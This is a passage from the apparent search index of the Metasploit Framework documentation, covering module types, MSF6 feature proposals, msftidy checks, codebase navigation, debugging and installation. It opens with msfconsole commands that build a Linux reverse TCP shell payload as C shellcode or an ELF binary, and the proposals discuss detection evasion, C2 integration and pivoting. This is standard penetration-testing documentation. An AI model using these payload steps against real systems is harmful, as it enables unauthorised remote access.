simple pingback command that verifies that code execution was successful against a vulnerable target. Payload modules can also be used individually to generate standalone executables, or shellcode for use within exploits: . msf6 payload(linux/x86/shell_reverse_tcp) &amp;gt; back msf6 &amp;gt; use payload/linux/x86/shell_reverse_tcp msf6 payload(linux/x86/shell_reverse_tcp) &amp;gt; set lhost 127.0.0.1 lhost =&amp;gt; 127.0.0.1 msf6 payload(linux/x86/shell_reverse_tcp) &amp;gt; set lport 4444 lport =&amp;gt; 4444 # Generate a payload for use within C msf6 payload(linux/x86/shell_reverse_tcp) &amp;gt; generate -f c # Generate an ELF file for execution on Linux environments msf6 payload(linux/x86/shell_reverse_tcp) &amp;gt; generate -f elf -o linux_shell . Post modules (430) . These modules are useful after a machine has been compromised and a Metasploit session has been opened. They perform useful tasks such as gathering, collecting, or enumerating data from a session. ",
    "url": "/docs/modules.html#module-types",
    "relUrl": "/docs/modules.html#module-types"
  },"662": {
    "doc": "Modules",
    "title": "Modules",
    "content": " ",
    "url": "/docs/modules.html",
    "relUrl": "/docs/modules.html"
  },"663": {
    "doc": "MSF6 Feature Proposals",
    "title": "Payloads and Post-exploitation",
    "content": "Meterpreter Transport and Scalability Overhaul . The Meterpreter Protocol “TLV” is enhanced to support modern features such as logging, unidirectional messages, obfuscation, sequence number reassembly and more. This feature will enable Meterpreter sessions to be more robust, faster, and evade detection with greater ease than before. Additionally, Meterpreter payload listeners, rather than being integrated straight into msfconsole, will run as an independent process that communicates with msfconsole (1 or more users) over RPC similar to the msfdb_ws (Metasploit Database Web Service). The external listener then replaces the ‘metasploit-aggregator’ project by not requiring an intermediate proxy to park or share sessions, these are done directly by having the listeners independent of console users. Listener capabilities be embeddable directly into Meterpreter payloads, allowing local listeners and remote listeners internal to other networks could be implemented the same way, enabling greater scalability and facilitating pivoting across more complex networks, allowing better post-exploitation possibilities in modern network environments. Integration with external C2 frameworks . If listeners are externalized, then there is an API layer both for interactive interaction with remote sessions, and a way for the Post-exploitation API to communicate with the external sessions. That should mean that if an external C2 framework supports at minimum shell interaction, a bulk of the Post-exploitation API should be applicable against external C2 frameworks as well. Metasploit would then be able to integrate both with other open-source C2 frameworks, as well as private ones. Integration of native tool-chains . Tools like Veil, pwnlib, etc. have for a long time used native compilers and tooling to build payloads and evasions. Metasploit has opted mostly for native Ruby solutions, though it does have some implicit runtime dependencies like apktool for Android payload injection. However, these tools are getting harder to maintain and use (e.g. metasm has a difficult time building any non-trivial C code, we just spent a month fixing a bug it had with Ruby 2.5 and Windows). It would be nice to have either be able to depend on a set of first-class toolchains being available in the environment, or have some way to package them natively with Metasploit itself. A full suite of compilers and tools does consume considerable amounts of space (e.g. mettle’s toolchain is 1.8GB uncompressed), but this is probably less of a problem than it was 15 years ago. Native first-class UUID-aware, async stager payload . Make a new async payload type (based on pingback payload work) making secure comms, endpoint verification, and async communication first-class citizens, and on by default. These session types would support a much more limited set of actions than Meterpreter, only supporting sleep/upload/download/stage, but would be upgraded to Meterpreter directly as-needed (maybe even transparently). Network protocols can be much more exotic for this, and the listener/payload should be usable externally from Metasploit as well. Todo: pull in async payload proposal notes from @bwatters-r7. ",
    "url": "/docs/development/propsals/msf6-feature-proposals.html#payloads-and-post-exploitation",
    "relUrl": "/docs/development/propsals/msf6-feature-proposals.html#payloads-and-post-exploitation"
  },"664": {
    "doc": "MSF6 Feature Proposals",
    "title": "Module Interface",
    "content": "Overhaul network targeting . Setting at least 5 variables RHOSTS/RPORT/SSL/VHOST/SSL_Version/User/Pass/etc… to target a single web application is very cumbersome. When these variables also do not apply to multiple RHOSTS exactly, the scheme of multiple variables falls apart further. Metasploit should be able to target URLs directly, that can all have their own independent ports, users, hostnames, etc: . set TARGETS https://user:password@target_app:4343 https://target_app2 . Overhaul credential targeting . The credential datastore options also has many different co-dependent and independent variables, which are confusing and awkward to use. In addition, there is little in the way of user-parallelism for using login scanners against single-service web apps. MSF6 should have an easier less messy overhaul of targeting multiple users and apps as well. Maybe TARGETS could be used the same way? . Collapse module types, expose module ‘abilities’ or ‘methods’ instead . Modules in Metasploit are classified according to what they can do (‘exploits can exploit, scanners can scan’) but often its useful to be able to scan for exploitable targets. Workarounds include reaching between modules and sharing library code and mixins. This proposal suggests that ‘exploit’ and ‘scanner’, as well as many other aux-type modules should collapse into a single module type. They simply expose capabilities like ‘scan’, ‘check’, ‘exploit’, etc. and a single module can do all of these. Additionally, ‘admin’ modules could be collapsed. For instance, why have a chromecast_reset and chromecast_youtube module when you can use ‘admin/chromecast’ and just type ‘cast’ or ‘reset’ as methods on this single module. This would also replace the ‘ACTIONS’ datastore option where they are used in multi-action aux modules. Integration with external exploitation frameworks . E.g. could we just use routersploit or wpsploit directly from within framework and gather loot/run post exploitation, etc. through them? Maybe using the external module RPC, just being able to expose multiple modules behind the same API? . Changing module structure on disk . Currently a non-trivial exploit module will require adding code to 4 different subdirectories (lib, modules, documentation, external) which makes it both hard to follow all of the moving pieces, but also makes it harder to extract modules for independent use. See Bundled Modules Proposal for a more detailed proposal. ",
    "url": "/docs/development/propsals/msf6-feature-proposals.html#module-interface",
    "relUrl": "/docs/development/propsals/msf6-feature-proposals.html#module-interface"
  },"665": {
    "doc": "MSF6 Feature Proposals",
    "title": "Data Model",
    "content": "Temporal / log-oriented data model . Metasploit implements a standard Ruby-on-Rails CRUD model for storing data about an environment. A Host object is created, updated, deleted, etc. But, anything can update anything, making it easy to lose data, and hard to notice changes over time. A workaround is religious use of workspaces to segregate observations, but that’s more of a workaround. A log-structured data model (observations about hosts/loot/credentials/services, etc.) should just be objects that are imported into a datastore that prioritizes search over everything else. Relationships between objects should be loose and maleable, as the way the graph of how objects are related can and does change over time in modern environments, often on the order of hours or minutes. As a concrete example, say every report_* method just wrote a JSON blob into elasticsearch. Then you would have first observed data, and when something else happens, say a password is cracked, rather than modifying a credential object, there would just be an enrichment object added to the data store, and both could be matched together later. The current data model also often doesn’t have ways of storing arbitrary information from modules that need it; loot is often used as a workaround, but it’s not searchable by content. Providing a way to store arbitrary JSON from modules would allow the flexibility to store anything, search for anything, and to never lose anything. Also, services would be removable as well from the database when a service is down. Note: a temporal data model will likely need something better able to show data relations than the current tabular rex-table approach in msfconsole. Web UI? . Data model is always available . The database in Metasploit has historically been optional. Not everyone needs to store data and setting up and maintaining the database is often a burden to the user, with many possible failure modes. Having the data model not always be available often complicates Metasploit’s code, and made some features like UUID tracking for payloads difficult to implement reliably. Metasploit 5 added web services for the data mode, which further complicated the code paths, adding a third way for behavior to possibly differ. We should make a light-weight in-memory database service that can run automatically if a persistent database is unavailable or unconfigured, which can always provide some sort of database service to Metasploit, even if it is ephemeral and exits when msfconsole/listeners, etc. have exited. framework.db should always exist, even if the data it stores goes into a temporary bit bucket. Then all of the conditional code paths can go away. ",
    "url": "/docs/development/propsals/msf6-feature-proposals.html#data-model",
    "relUrl": "/docs/development/propsals/msf6-feature-proposals.html#data-model"
  },"666": {
    "doc": "MSF6 Feature Proposals",
    "title": "Infrastructure",
    "content": "First class user-oriented documentation . Provide a means for the community to document changes to how Metasploit works (developer and user), unify various documentation resources. Make Metasploit Higher-performance / lighter weight . As subcomponents get carved off (external database service, external listeners), they should be implemented in a lighter weight way. We have some prototypes of the database web service rewritten in golang, and a persistent payload generation service that can be used my a client-only msfvenom-like tool can speed up execution considerably. Sunsetting, separation of old module / code . Metasploit has some really old modules that probably don’t get used very often. Can we segregate these or sunset them so that the overall number of modules is reduced? . Integration of separate Metasploit projects into fewer repos (rex / payloads / metasploit data models) . Metasploit is spread out across over a dozen different repos. Let’s merge them as much as we can to make it easier to change them across the board (e.g. when changing the data model) and to make it easier to have parallel branches for stable/unstable work. ",
    "url": "/docs/development/propsals/msf6-feature-proposals.html#infrastructure",
    "relUrl": "/docs/development/propsals/msf6-feature-proposals.html#infrastructure"
  },"667": {
    "doc": "MSF6 Feature Proposals",
    "title": "MSF6 Feature Proposals",
    "content": "List of potential major features (things that would make major breaking changes) for MSF6: . ",
    "url": "/docs/development/propsals/msf6-feature-proposals.html",
    "relUrl": "/docs/development/propsals/msf6-feature-proposals.html"
  },"668": {
    "doc": "Msftidy",
    "title": "Description",
    "content": " ",
    "url": "/docs/development/quality/msftidy.html#description",
    "relUrl": "/docs/development/quality/msftidy.html#description"
  },"669": {
    "doc": "Msftidy",
    "title": "Checks",
    "content": " ",
    "url": "/docs/development/quality/msftidy.html#checks",
    "relUrl": "/docs/development/quality/msftidy.html#checks"
  },"670": {
    "doc": "Msftidy",
    "title": "File modes",
    "content": "This check ensures that modules are not marked executable. A module is only called by the framework and not directly. The correct file mode is 0644, which will ensure that other users are only able to read the file, and that the current user is only able to read and write the file, not execute it. ",
    "url": "/docs/development/quality/msftidy.html#file-modes",
    "relUrl": "/docs/development/quality/msftidy.html#file-modes"
  },"671": {
    "doc": "Msftidy",
    "title": "Shebang",
    "content": "A module should not have a Shebang line. ",
    "url": "/docs/development/quality/msftidy.html#shebang",
    "relUrl": "/docs/development/quality/msftidy.html#shebang"
  },"672": {
    "doc": "Msftidy",
    "title": "Nokogiri",
    "content": "Modules should not rely on the Nokogiri GEM. Please use REXML instead. ",
    "url": "/docs/development/quality/msftidy.html#nokogiri",
    "relUrl": "/docs/development/quality/msftidy.html#nokogiri"
  },"673": {
    "doc": "Msftidy",
    "title": "Invalid Formats",
    "content": "CVE . CVE references should be in the format YYYY-NNNN . BID . BID references should only contain numbers . MSB . OSVDB references should be in the format MSddd-ddd (d = digit) . MIL . Milw0rm references are no longer supported (site suspended) . EDB . EDB references should only contain numbers . US-CERT-VU . US-CERT references should only contain numbers . ZDI . ZDI references should be in the format dd-ddd or dd-dddd (d = digit) . URL . If you supply an URL where a short identifier is available, please use the identifier. ",
    "url": "/docs/development/quality/msftidy.html#invalid-formats",
    "relUrl": "/docs/development/quality/msftidy.html#invalid-formats"
  },"674": {
    "doc": "Msftidy",
    "title": "Old Keywords",
    "content": "Before Metasploit moved to Github the sources were stored in a SVN repository. SVN has support to replace custom variables with current values like the last revision. Since GIT does not support them, the references should be removed from code. ",
    "url": "/docs/development/quality/msftidy.html#old-keywords",
    "relUrl": "/docs/development/quality/msftidy.html#old-keywords"
  },"675": {
    "doc": "Msftidy",
    "title": "Verbose",
    "content": "You should not define a VERBOSE option in your module. A VERBOSE option is already provided by the framework. To make use of the VERBOSE setting, you can use methods like vprint_status and vprint_error . ",
    "url": "/docs/development/quality/msftidy.html#verbose",
    "relUrl": "/docs/development/quality/msftidy.html#verbose"
  },"676": {
    "doc": "Msftidy",
    "title": "Badchars",
    "content": "This checks looks for bad characters in the module title. If you encounter this error, please replace the characters. ",
    "url": "/docs/development/quality/msftidy.html#badchars",
    "relUrl": "/docs/development/quality/msftidy.html#badchars"
  },"677": {
    "doc": "Msftidy",
    "title": "File Extension",
    "content": "All modules should have a .rb file extension to be loaded by the framework. ",
    "url": "/docs/development/quality/msftidy.html#file-extension",
    "relUrl": "/docs/development/quality/msftidy.html#file-extension"
  },"678": {
    "doc": "Msftidy",
    "title": "Old Rubies",
    "content": "This check checks the file for syntax errors with old Ruby versions. By default this check will not run. To execute this check you need to set the environment variable MSF_CHECK_OLD_RUBIES. ",
    "url": "/docs/development/quality/msftidy.html#old-rubies",
    "relUrl": "/docs/development/quality/msftidy.html#old-rubies"
  },"679": {
    "doc": "Msftidy",
    "title": "Ranking",
    "content": "This check ensures you added the correct Exploit Ranking to your module. ",
    "url": "/docs/development/quality/msftidy.html#ranking",
    "relUrl": "/docs/development/quality/msftidy.html#ranking"
  },"680": {
    "doc": "Msftidy",
    "title": "Disclosure Date",
    "content": "Date format needs to be Month Day, YYYY. Example: Jan 01, 2014 . ",
    "url": "/docs/development/quality/msftidy.html#disclosure-date",
    "relUrl": "/docs/development/quality/msftidy.html#disclosure-date"
  },"681": {
    "doc": "Msftidy",
    "title": "Title Casing",
    "content": "This check ensures you used the correct case in your title. ",
    "url": "/docs/development/quality/msftidy.html#title-casing",
    "relUrl": "/docs/development/quality/msftidy.html#title-casing"
  },"682": {
    "doc": "Msftidy",
    "title": "Bad Terms",
    "content": "This checks for the correct use of the terms Stack Buffer overflow and Stack Exhaustion. See “Stack exhaustion” vs “Stack buffer overflow” for more information. ",
    "url": "/docs/development/quality/msftidy.html#bad-terms",
    "relUrl": "/docs/development/quality/msftidy.html#bad-terms"
  },"683": {
    "doc": "Msftidy",
    "title": "Function Arguments",
    "content": "If you define a function which defines a lot of input arguments, the check ensures you use a hash instead. ",
    "url": "/docs/development/quality/msftidy.html#function-arguments",
    "relUrl": "/docs/development/quality/msftidy.html#function-arguments"
  },"684": {
    "doc": "Msftidy",
    "title": "Line Check",
    "content": "Unicode . Your module must not contain Unicode characters. Spaces at EOL . Your module must not contain spaces at the end of a line. Mixed Tab Spaces . Your module contains Tabs and Spaces in one line. Only spaces should be used . Tabs . Your module should not use tabs for intending code. Please use spaces instead. Carriage return . The specified line only contains a carriage return (\\r) at the end of line. Please change to a normal linebreak (\\n or \\r\\n). File.open . You used a File.open call without specifying a binary mode??? . Load . You used the load command in your module. This is not required since the framework loads all necessary files for you. STDOUT . Modules should not write directly to stdout. Please use the print_* functions instead. Modified datastore . Datastore options (options set by the user) should not be modified in code. If you need to change some values use local variables instead. Set-Cookie . The Set-Cookie header should not be parsed by your code. You can use the API call res.get_cookies insteady which already handles some special cases and ensures a clean header. Auxiliary Rand . Auxiliary modules should have no Rank. Only Exploits and Payloads should have a Rank attribute. ",
    "url": "/docs/development/quality/msftidy.html#line-check",
    "relUrl": "/docs/development/quality/msftidy.html#line-check"
  },"685": {
    "doc": "Msftidy",
    "title": "Snake Case",
    "content": "This check ensures your module filename is in Snake Case . ",
    "url": "/docs/development/quality/msftidy.html#snake-case",
    "relUrl": "/docs/development/quality/msftidy.html#snake-case"
  },"686": {
    "doc": "Msftidy",
    "title": "Old License",
    "content": "This check checks for the old Metasploit license in the module header. You can use the tool ruby tools/dev/resplat.rb &amp;lt;filename&amp;gt; to convert the file. ",
    "url": "/docs/development/quality/msftidy.html#old-license",
    "relUrl": "/docs/development/quality/msftidy.html#old-license"
  },"687": {
    "doc": "Msftidy",
    "title": "VULN Codes",
    "content": "This check ensures only known CheckCodes are returned by the check function. ",
    "url": "/docs/development/quality/msftidy.html#vuln-codes",
    "relUrl": "/docs/development/quality/msftidy.html#vuln-codes"
  },"688": {
    "doc": "Msftidy",
    "title": "vars_get",
    "content": "When using send_request_cgi or send_request_raw the URL supplied should not contain GET Parameter. Please provide the Parameter via the vars_get hash. bad: . res = send_request_raw({ 'uri' =&amp;gt; uri_base + '/upload.php?type=file&amp;amp;folder=' + folder }) . good: . res = send_request_raw({ 'uri' =&amp;gt; uri_base + '/upload.php', 'vars_get' =&amp;gt; { 'type' =&amp;gt; 'file', 'folder' =&amp;gt; folder } }) . ",
    "url": "/docs/development/quality/msftidy.html#vars_get",
    "relUrl": "/docs/development/quality/msftidy.html#vars_get"
  },"689": {
    "doc": "Msftidy",
    "title": "Msftidy",
    "content": " ",
    "url": "/docs/development/quality/msftidy.html",
    "relUrl": "/docs/development/quality/msftidy.html"
  },"690": {
    "doc": "Navigating the codebase",
    "title": "Overview",
    "content": "One of the most important things to learn when first working with Metasploit is how to navigate Metasploit’s codebase. However, its often not immediately clear how this should be done. This page aims to explain some of the different approaches that one can take when navigating Metasploit’s codebase and provides a primer for learning how Metasploit’s codebase is structured. A quick reminder before we get started, but one can always access the Metasploit Slack at https://metasploit.slack.com/. Normally this page should allow you to sign up, however if for any reason you cannot, feel free to shoot an email to msfdev at rapid7 dot com and we will be happy to send you an invite link. ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#overview",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#overview"
  },"691": {
    "doc": "Navigating the codebase",
    "title": "Metasploit Code Structure",
    "content": "A great outline of Metasploit’s code structure can be found at https://www.offensive-security.com/metasploit-unleashed/metasploit-architecture/, which should be referred to for an overview of Metasploit’s code structure. To repeat what is said there there are the following main subdirectories: . | data - Our general data storage area. Used to store wordlists for use by modules, binaries that are used by exploits, images, and more. | db - Holds the Metasploit module database information. The modules_metadata_base.json file here gets updated every time a new module is pushed into the framework or the properties of one gets updated, so that Metasploit can do things like autocompleting module names. | docker - Files related to building a docker instance of Metasploit Framework. | documentation - This is the documentation directory. Every module that has been landed within the last 3-4 years is required to have documentation along with the exploit code. You may find older exploits do not have documentation; if you’d like to help out with this we have an open task at https://github.com/rapid7/metasploit-framework/issues/12389 for adding missing documentation to some auxiliary modules. | external - Used as a storage area for the source code of the binaries that modules might depend on, as well as burpsuite, zsh tab completion, and a Metasploit specific fork of the serialport project. | lib - Where all the library code goes. If your working on something that could affect multiple modules, that code will likely be contained in a library stored under this directory. | modules - All modules are stored under this directory, and are further broken down into several categories. | modules/exploit - Stores exploit modules which generally tend to gain you a shell of some sort. | modules/auxiliary - Stores auxiliary modules, which are used to gain information and generally don’t gain a shell. | modules/post - Stores post modules which perform useful actions after one has gained access to a target. | modules/encoders - Stores encoder modules which are used to encode various payloads to help avoid bad characters or provide additional obfuscation. | modules/evasion - Stores evasion modules which are used to help avoid antivirus. | modules/nops - Stores NOP modules used for generating NOP shellcode for various architectures. | plugins - Used for storing various Metasploit plugins that allow Metasploit to integrate with other programs or import data from other programs. | scripts - Stores various scripts used within Metasploit, such as Meterpreter, and scripts for the console interface of Metasploit Framework. | spec - Contains various RSpec checks that are used to ensure libraries and core functionality within the framework are working as expected. If you are writing a new library or adjusting one, you may need to update the corresponding RSpec file within this directory to ensure the specification checks are updated to reflect the new behavior. | test - Contains tests for various parts of Metasploit code to ensure they are operating as expected. | tools - Contains various tools that may be helpful under different situations. The dev directory contains tools useful during development, such as tools/dev/msftidy_docs.rb which helps ensure your documentation is in line with standards.~~ | . ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#metasploit-code-structure",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#metasploit-code-structure"
  },"692": {
    "doc": "Navigating the codebase",
    "title": "Code Navigation Tools",
    "content": " ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#code-navigation-tools",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#code-navigation-tools"
  },"693": {
    "doc": "Navigating the codebase",
    "title": "GitHub Code Navigation",
    "content": "You can search through the code of Metasploit using GitHub with searches such as https://github.com/rapid7/metasploit-framework/search?l=Ruby&amp;amp;q=%22payload.arch%22&amp;amp;type=code. Note that double quotes are required to match specifically on a certain term; in the previous example this term was payload.arch. You can also set the type=code parameter to specifically match only on code results, however this can be set to commits or issues if you want to search commits or issues instead. Finally notice that when searching code, its important to also specify the language of the files you want to match. In the case above I made it so that my results would only match on files deemed by GitHub to contain Ruby code, however you can also specify other languages such as Batch, or C if you want those languages instead. You can even remove the language restriction if you find your search results are too narrow. Another incredibly useful feature of GitHub is the ability to search across all repositories that an organization owns. This is especially useful in Metasploit as certain components, such as Rex code and payload code, may be contained in repositories other than metasploit-framework. To search across the public repositories that Rapid7 owns, use a search such as https://github.com/search?q=org%3Arapid7+%22payload.arch%22&amp;amp;type=code. Note the presence of the org:rapid7 tag within the previous URL: this tells GitHub to look through all repositories that Rapid7 owns for the term payload.arch within any code files. Experiment with these results and play around with GitHub searches more. Over time you will learn where it is useful and where it has its limitations and will be able to determine when it might be better to use an IDE to help understand a piece of code more. ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#github-code-navigation",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#github-code-navigation"
  },"694": {
    "doc": "Navigating the codebase",
    "title": "SolarGraph Code Navigation",
    "content": "A better way to navigate code, particularly across repos, and also find out where things are defined using an easy to use interface, is SourceGraph from https://sourcegraph.com. The interface is not hard to use and you can find several tutorials over at https://docs.sourcegraph.com/tutorials on how to use it. The main benefit of SourceGraph over GitHub is the ability to search all known repositories at once and then easily jump between definitions using either the online search at https://sourcegraph.com/search, or the GitHub integrated browser plugin from https://docs.sourcegraph.com/integration/browser_extension to allow easy navigation of Metasploit and Rapid7 code from your GitHub PR reviews. It is also recommended to review the tutorials and better understand some of the advanced search capabilities of SourceGraph as they do provide some useful search functionality that is not available or may be harder to perform with GitHub. ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#solargraph-code-navigation",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#solargraph-code-navigation"
  },"695": {
    "doc": "Navigating the codebase",
    "title": "IDE Code Navigation",
    "content": " ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#ide-code-navigation",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#ide-code-navigation"
  },"696": {
    "doc": "Navigating the codebase",
    "title": "RubyMine Code Navigation",
    "content": "One of the best ways to navigate the codebase within Metasploit is to use RubyMine, available from https://www.jetbrains.com/ruby/. Whilst it is a paid tool, it offers a variety of neat referencing finding features such as the ability to right click on a method name and select Find Usages, or to right click the method name and select Go To -&amp;gt; Declaration or Usages to find all the locations where that method might of been defined within the codebase, which can make tracing complex definitions that wind between library and module code much easier. RubyMine also offers autocompletion and integrates well with many tools such as Git to allow you to quickly switch branches and RuboCop to help provide suggestions on where your code style could be improved. For a cheaper option one can also use VS Code. Note however that VS Code does not have the best autotab completion and will not allow you to trace references, however if your willing to put up with this, it is a much faster and more lightweight product than RubyMine, which makes it great for those times when you just need to edit a piece of code without loading a bunch of related files that you don’t need to reference or edit. It also has great regex search features that work much faster than RubyMine, allowing you to search for items within the codebase a lot quicker than you can with RubyMine, which will often seem to stutter at times due to its larger overhead. Ultimately though the tool that you pick should be up to you. Some may prefer to work with vim/nano/emacs or some other command line editor over a GUI interface. Use whatever you can afford and feels comfortable to you! . ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#rubymine-code-navigation",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#rubymine-code-navigation"
  },"697": {
    "doc": "Navigating the codebase",
    "title": "SolarGraph Code Navigation - VSCode",
    "content": "We’d be remiss to not mention SolarGraph as a potential plugin that one can use to navigate code within VSCode. This tool provides a lot of the autocomplete and IntelliSense functionality you might get from dedicated IDEs such as RubyMine, within VSCode itself. The tool can be installed by running gem install solargraph-rails for the Rails integrations, which will also in turn install solargraph itself. If you just want SolarGraph without the Rails integrations, run gem install solargraph. The configuration file for SolarGraph itself can be found at .solargraph.yml within the root directory of Metasploit Framework. For more information on how this works and how to tweak it, please refer to https://solargraph.org/guides/configuration. Once the Gem files have been installed, the next step is to install the VSCode plugin. You can grab it from https://marketplace.visualstudio.com/items?itemName=castwide.solargraph. Once this is done, run the following commands to ensure that SolarGraph is using the most up to date information about your code: . bundle install # Update all the gems yard gems # Create documentation files for all the gems. SolarGraph relies on YARD for a lot of info. yard doc -c # Create YARD docs for all files and use the cache so we don't repeat work (-c option). solargraph bundle # Update Solargraph documentation for bundled gems . Then close down VSCode and restart it again, opening up the metasploit-framework directory again as a project if needs be. This should result in the SolarGraph server starting and then taking a few minutes to index your files. Note that this process may occur every time you open up the metasploit-framework project. This is normal and to be expected. If you’d like to save yourself some time, you can have YARD automatically generate new documentation for installed Gems by running yard config --gem-install-yri which will configure YARD to automatically generate documentation whenever new Gems are installed. ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#solargraph-code-navigation---vscode",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#solargraph-code-navigation---vscode"
  },"698": {
    "doc": "Navigating the codebase",
    "title": "Debugging Metasploit",
    "content": " ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#debugging-metasploit",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#debugging-metasploit"
  },"699": {
    "doc": "Navigating the codebase",
    "title": "Pry Debugging",
    "content": "Occasionally, simply reading through Metasploit code may not be helpful. You need to actually get into the weeds and learn what a piece of code is doing. In these cases, it may be helpful to use pry, a Ruby Debugger that can be launched at a specific place within your code and which allows you to view the state of the program at that time, make adjustments as needed, and then either step through the program or continue to let it run. You can enter into an interactive debugging environment using pry by adding the following code snippet within your Metasploit module or library method: . require 'pry'; binding.pry . Pry includes inbuilt commands for code navigation: . | backtrace: Show the current call stack | up / down: Navigate the call stack | step: Move forward by a single execution step | next: Move forward by a single line | whereami: Show the current breakpoint location again | help: View all of the available commands and options | . Ruby’s runtime introspection can be used to view the available methods, classes, and variables within the current Ruby environment: . | self: To find out what the current object is | self.methods: Find all available methods | self.methods.grep /send/: Searching for a particular method that you’re interested in. This can be great to explore unknown APIs. | self.method(:connect).source_location: Find out which file, and which line, defined a particular method | self.class.ancestors: For complex modules, this can be useful to see what mixins a Metasploit module is currently using | . To learn more about Pry, we recommend reading GitLab’s guide at https://docs.gitlab.com/ee/development/pry_debugging.html. ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#pry-debugging",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#pry-debugging"
  },"700": {
    "doc": "Navigating the codebase",
    "title": "Debug.gem Debugging",
    "content": "Ruby 3.1 and later come with debug.gem installed automatically, which is the new default debugger for Ruby. It replaces the old lib/debug.rb library that was not actively being maintained and replaces it with a modern debugging library capable of performing many debugging actions with next to no impact on the performance of the debugged application. Whilst RubyMine does not support the debug.gem functionality, you can use VSCode to take advantage of debug.gem to get speedy debugging of Ruby scripts from within VSCode itself. Simply install the debugging plugin from https://marketplace.visualstudio.com/items?itemName=KoichiSasada.vscode-rdbg, then go to the Metasploit root directory, and if you have Bundler installed, run bundle install. This will bring in the latest version of the debug gem. Once this is all done, open the metasploit-framework folder from a cloned GitHub copy of Metasploit Framework in VSCode by using File-&amp;gt;Open Folder. Then click Run-&amp;gt;Add Configuration-&amp;gt;Ruby(rdbg). This will create a file at &amp;lt;metasploit root&amp;gt;/.vscode/launch.json. Replace the contents of this file with the contents of the file at https://github.com/rapid7/metasploit-framework/blob/master/external/vscode/launch.json. If you wish, you can optionally change the listening port from 55634 in the script to one of your choice. Finally click Run-&amp;gt;Start Debugging to start debugging Metasploit Framework using VSCode. This may cause a prompt to appear that looks like bundle exec ruby /home/tekwizz123/git/metasploit-framework/msfconsole. Confirm this looks okay and that you are using bundle exec ruby to execute msfconsole. If all looks good, hit the ENTER key to confirm. At this point you should see Metasploit Framework open up. If you want to prevent this prompt in the future then simply remove the \"askParameters\": true, line from launch.json. Once in a debugging session, debug.gem supports the same commands as Pry in may cases, so the commands listed in the Pry section above should work in the same manner. Additionally debug.gem also supports extra commands for things such as tracing data. For more details refer to the command list at https://github.com/ruby/debug#debug-command-on-the-debug-console which provides a detailed list of debug.gem’s supported commands. For more information on the VSCode rdbg plugin, refer to https://code.visualstudio.com/docs/languages/ruby and https://marketplace.visualstudio.com/items?itemName=KoichiSasada.vscode-rdbg. ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#debuggem-debugging",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#debuggem-debugging"
  },"701": {
    "doc": "Navigating the codebase",
    "title": "RubyMine Debugging",
    "content": "RubyMine comes with its own built in debugger that is based off of the old lib/debug.rb library in Ruby, however it has custom patches and modifications applied to it by the JetBrains team. To set it up, first clone the Git repository for Metasploit-Framework locally, then go File-&amp;gt;Open and click on the metasploit-framework folder to open it as a project. Once this is done, go to Run-&amp;gt;Edit Configurations and click the plus sign to add a new configuration. Select Ruby, and in the name field, enter a name that makes sense for you, such as Metasploit Debug. Under Ruby Script, enter the full path to msfconsole on your local machine. Finally, set the SDK to either Use Project SDK or select another Ruby SDK that RubyMine recognizes. You can add a Ruby SDK by going to File-&amp;gt;Settings-&amp;gt;Languages and Frameworks-&amp;gt;Ruby SDK and Gems and clicking the plus sign. ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#rubymine-debugging",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#rubymine-debugging"
  },"702": {
    "doc": "Navigating the codebase",
    "title": "Navigating the codebase",
    "content": " ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html"
  },"703": {
    "doc": "Nightly Installers",
    "title": "Installing Metasploit on Linux / macOS",
    "content": "The following script invocation will import the Rapid7 signing key and setup the package for supported Linux and macOS systems: . curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb &amp;gt; msfinstall &amp;amp;&amp;amp; \\ chmod 755 msfinstall &amp;amp;&amp;amp; \\ ./msfinstall . Once installed, you can launch msfconsole as /opt/metasploit-framework/bin/msfconsole from a terminal window, or depending on your environment, it may already be in your path and you can just run it directly. On first run, a series of prompts will help you setup a database and add Metasploit to your local PATH if it is not already. These packages integrate into your package manager and can be updated with the msfupdate command, or with your package manager. On first start, these packages will automatically setup the database or use your existing database. Linux manual installation . Linux packages are built nightly for .deb (i386, amd64, armhf, arm64) and .rpm (64-bit x86) systems. Debian/Ubuntu packages are available at https://apt.metasploit.com and CentOS/Redhat/Fedora packages are located at https://rpm.metasploit.com. macOS manual installation . The latest OS X installer package can also be downloaded directly here: https://osx.metasploit.com/metasploitframework-latest.pkg, with the last 8 builds archived at https://osx.metasploit.com/. Simply download and launch the installer to install Metasploit Framework with all of its dependencies. ",
    "url": "/docs/using-metasploit/getting-started/nightly-installers.html#installing-metasploit-on-linux--macos",
    "relUrl": "/docs/using-metasploit/getting-started/nightly-installers.html#installing-metasploit-on-linux--macos"
  },"704": {
    "doc": "Nightly Installers",
    "title": "Installing Metasploit on Windows",
